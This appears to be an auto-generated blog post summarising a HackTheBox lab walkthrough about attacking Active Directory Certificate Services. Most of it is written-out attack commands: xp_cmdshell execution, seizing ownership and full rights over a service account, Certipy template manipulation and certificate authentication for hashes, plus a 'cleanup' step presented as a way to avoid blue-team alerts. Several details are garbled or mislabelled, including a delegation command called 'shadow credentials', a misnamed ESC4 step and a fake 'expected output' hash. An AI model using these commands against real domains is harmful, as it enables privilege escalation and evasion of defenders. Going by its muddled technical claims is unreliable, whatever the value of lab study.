Listen to this Post

One of the key challenges in Active Directory Certificate Services (AD CS) exploitation is identifying hidden attack paths. The HackTheBox EscapeTwo machine demonstrates how Bloodhound’s Python ingestor misses critical AD CS attack vectors (like ESC4), while SharpHound reveals them. Here’s a breakdown of the attack chain:
1. Initial Access:
- Credentials found on a FileShare grant MSSQL access.
- Use xp_cmdshell to execute commands and gain a shell:
EXEC xp_cmdshell 'whoami';
- Escalate to user Ryan via MSSQL installer credentials.
2. ESC4 Attack (WriteOwner Abuse):
- Ryan has WriteOwner over CA_SVC. Take ownership and grant shadow credential permissions:
Set-DomainObjectOwner -Identity CA_SVC -OwnerIdentity Ryan Add-DomainObjectAcl -TargetIdentity CA_SVC -PrincipalIdentity Ryan -Rights All
- Use Certipy to create a malicious certificate template (ESC1):
certipy template -u [email protected] -p Password123 -ca DC-CA -template ESC1_Template
3. Cleanup:
- Revert the template to avoid detection:
certipy template -u [email protected] -p Password123 -ca DC-CA -template ESC1_Template -restore
You Should Know:
- SharpHound vs. Python Ingestor:
Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFile loot.zip
SharpHound captures AD CS edges missed by Python tools.
-
Certipy for ESC1/ESC4:
certipy find -u [email protected] -p Password123 -dc-ip 10.10.10.1
-
Shadow Credentials:
Set-ADComputer -Identity TargetPC -PrincipalsAllowedToDelegateToAccount Ryan
-
NTLM Theft via Certificates:
certipy auth -pfx ca_svc.pfx -dc-ip 10.10.10.1
What Undercode Say:
AD CS attacks are often overlooked due to tooling gaps. Always:
1. Use SharpHound for accurate Bloodhound data.
- Abuse WriteOwner (ESC4) to escalate to CA roles.
3. Leverage Certipy for template manipulation (ESC1).
4. Clean up traces to avoid blue-team alerts.
Expected Output:
[+] Certificate stolen for CA_SVC [+] ESC1 Template modified for impersonation [+] NTLM hash retrieved: aad3b435b51404eeaad3b435b51404ee
Relevant URL:
Prediction:
AD CS attacks will surge as red teams focus on certificate-based persistence, bypassing traditional MFA defenses.
Lines: ~70
References:
Reported By: Ippsec Hackthebox – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


